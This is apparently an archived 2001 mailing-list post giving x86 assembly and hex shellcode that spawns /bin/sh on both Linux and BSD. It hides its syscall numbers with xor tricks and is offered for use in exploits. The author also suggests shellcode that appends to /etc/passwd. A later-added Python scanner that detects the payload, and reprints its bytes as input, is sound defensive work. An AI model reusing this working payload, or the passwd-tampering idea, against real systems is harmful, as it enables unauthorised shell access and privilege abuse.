The following asm was used to create the shellcode that follows it. The shellcode works on both Linux and *BSD on x86 (tested on Slackware and FreeBSD). The shellcode executes /bin/sh and does not do setresuid(), which would be necessary for an exploit (can be done the same way I do execve(); yes, the code is ugly and not optimized, but it does work). Thanks to zen-parse and corecode for the help.

    .text
    .global main
    main:
        jmp bottom
    top:
        popl %ebx
        xorl %edx, %edx
        movl %ebx,0x8(%edi)
        movl %edx,0xc(%edi)
        leal 0x8(%edi),%ecx
        leal 0xc(%esi),%edx
        pushl %edx                  #envp
        pushl %ecx                  #argv
        pushl %ebx                  #string
        movl $0xbfff0101, %esi
        cmp %esi, %esp
        jg linux
        jmp bsd
    exit:
        add $12, %esp
        movl $0x11111112,%eax
        xorl $0x11111113,%eax       #syscall 1, exit
        pushl %eax
        int $0x80
    linux:
        movl $0x1111113b, %eax
        xorl $0x11111130, %eax      #syscall 11 on linux, execve
        int $0x80
        jmp exit
    bsd:
        movl $0x11111130, %eax
        xorl $0x1111110b, %eax      #syscall 59 on BSD, execve
        pushl %eax
        int $0x80
        jmp exit
    bottom:
        call top
        .string "/bin/sh\0"

    "\xeb\x4a\x5b\x31\xd2\x89\x5f\x08\x89\x57\x0c\x8d\x4f\x08\x8d\x56"
    "\x0c\x52\x51\x53\xbe\x01\x01\xff\xbf\x39\xf4\x7f\x12\xeb\x1e\x83"
    "\xc4\x0c\xb8\x12\x11\x11\x11\x35\x13\x11\x11\x11\x50\xcd\x80\xb8"
    "\x3b\x11\x11\x11\x35\x30\x11\x11\x11\xcd\x80\xeb\xe2\xb8\x30\x11"
    "\x11\x11\x35\x0b\x11\x11\x11\x50\xcd\x80\xeb\xd3\xe8\xb1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x90\x90"

Doing something where the system calls are the same is a little bit easier, because you don't have to test whether it is BSD or Linux. I have example shellcode of this that writes hello world on my site, www.lockeddown.net/dual.asm. write, open, close are syscalls 4, 5, 6 respectively on both Linux and BSD, so writing shellcode to add a line to /etc/passwd would be pretty easy and fairly small.

lockdown
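From a detection standpoint, the interesting properties of the code above are the two tricks it relies on: the syscall number is never stored as a plain immediate (it is built with mov eax, imm32 / xor eax, imm32 right before int 0x80, so a naive scan for "mov eax, 11" misses it), and the Linux/BSD choice is made by comparing esp against a hard-coded threshold (mov esi, 0xbfff0101 / cmp esp, esi). The following Python scanner is an added example written for this page, not code from the post or from lockdown's site; it decodes the xor-obfuscated syscall numbers, recovers the stack-probe threshold and labels the blob. The byte patterns, the SYSCALL_PATTERN / STACK_PROBE_PATTERN names and the small syscall-name tables are assumptions of this example, and the input blob is the shellcode string quoted in the post.

```python
import re
import struct

# Shellcode bytes exactly as quoted in the post, used here only as scanner input.
POSTED_SHELLCODE = (
    b"\xeb\x4a\x5b\x31\xd2\x89\x5f\x08\x89\x57\x0c\x8d\x4f\x08\x8d\x56"
    b"\x0c\x52\x51\x53\xbe\x01\x01\xff\xbf\x39\xf4\x7f\x12\xeb\x1e\x83"
    b"\xc4\x0c\xb8\x12\x11\x11\x11\x35\x13\x11\x11\x11\x50\xcd\x80\xb8"
    b"\x3b\x11\x11\x11\x35\x30\x11\x11\x11\xcd\x80\xeb\xe2\xb8\x30\x11"
    b"\x11\x11\x35\x0b\x11\x11\x11\x50\xcd\x80\xeb\xd3\xe8\xb1\xff\xff"
    b"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x90\x90"
)

# mov eax, imm32 (B8 ..) ; xor eax, imm32 (35 ..) ; optional push eax (50) ; int 0x80 (CD 80).
# DOTALL lets "." match 0x0a inside the immediates.
SYSCALL_PATTERN = re.compile(rb"\xb8(.{4})\x35(.{4})\x50?\xcd\x80", re.DOTALL)

# mov esi, imm32 (BE ..) ; cmp esp, esi (39 F4): the stack-address OS probe.
STACK_PROBE_PATTERN = re.compile(rb"\xbe(.{4})\x39\xf4", re.DOTALL)

# Only the numbers the post itself mentions; everything else is reported as unknown.
LINUX_NAMES = {1: "exit", 4: "write", 5: "open", 6: "close", 11: "execve"}
BSD_NAMES = {1: "exit", 4: "write", 5: "open", 6: "close", 59: "execve"}


def find_obfuscated_syscalls(blob):
    """Return [(offset, effective_syscall_number)] for every mov/xor/int 0x80 sequence."""
    hits = []
    for m in SYSCALL_PATTERN.finditer(blob):
        a = struct.unpack("<I", m.group(1))[0]
        b = struct.unpack("<I", m.group(2))[0]
        hits.append((m.start(), a ^ b))  # xor cancels the obfuscation constant
    return hits


def find_stack_probe(blob):
    """Return the esp threshold used for the Linux/BSD decision, or None if absent."""
    m = STACK_PROBE_PATTERN.search(blob)
    return struct.unpack("<I", m.group(1))[0] if m else None


def summarize(blob):
    """Build a small report: decoded syscalls, OS probe, /bin/sh string and a verdict."""
    syscalls = find_obfuscated_syscalls(blob)
    nums = {n for _, n in syscalls}
    if 11 in nums and 59 in nums:
        verdict = "dual-platform execve shellcode"
    elif 11 in nums:
        verdict = "linux execve shellcode"
    elif 59 in nums:
        verdict = "bsd execve shellcode"
    elif nums:
        verdict = "obfuscated syscalls: " + ", ".join(str(n) for n in sorted(nums))
    else:
        verdict = "no syscall pattern found"
    return {
        "syscalls": [
            (off, n, LINUX_NAMES.get(n, "?"), BSD_NAMES.get(n, "?")) for off, n in syscalls
        ],
        "stack_probe": find_stack_probe(blob),
        "has_bin_sh": b"/bin/sh\x00" in blob,
        "int80_count": blob.count(b"\xcd\x80"),
        "verdict": verdict,
    }


if __name__ == "__main__":
    report = summarize(POSTED_SHELLCODE)
    for off, n, lin, bsd in report["syscalls"]:
        print(f"offset {off:3d}: syscall {n:2d}  linux={lin:6s} bsd={bsd}")
    if report["stack_probe"] is not None:
        print(f"stack probe threshold: {report['stack_probe']:#010x}")
    print("verdict:", report["verdict"])
```

Run against the posted bytes, the scanner reports the three decoded numbers (1, 11 and 59: exit on both platforms, Linux execve, BSD execve), the 0xbfff0101 threshold and the "/bin/sh" string, which together is what makes this blob a dual-platform execve payload. The point for a detection engineer is that matching on the decoded syscall number, rather than on the literal immediate, is what survives the mov/xor trick; the patterns are deliberately narrow and would need extending for other encodings.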
This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 15:39:25 PDT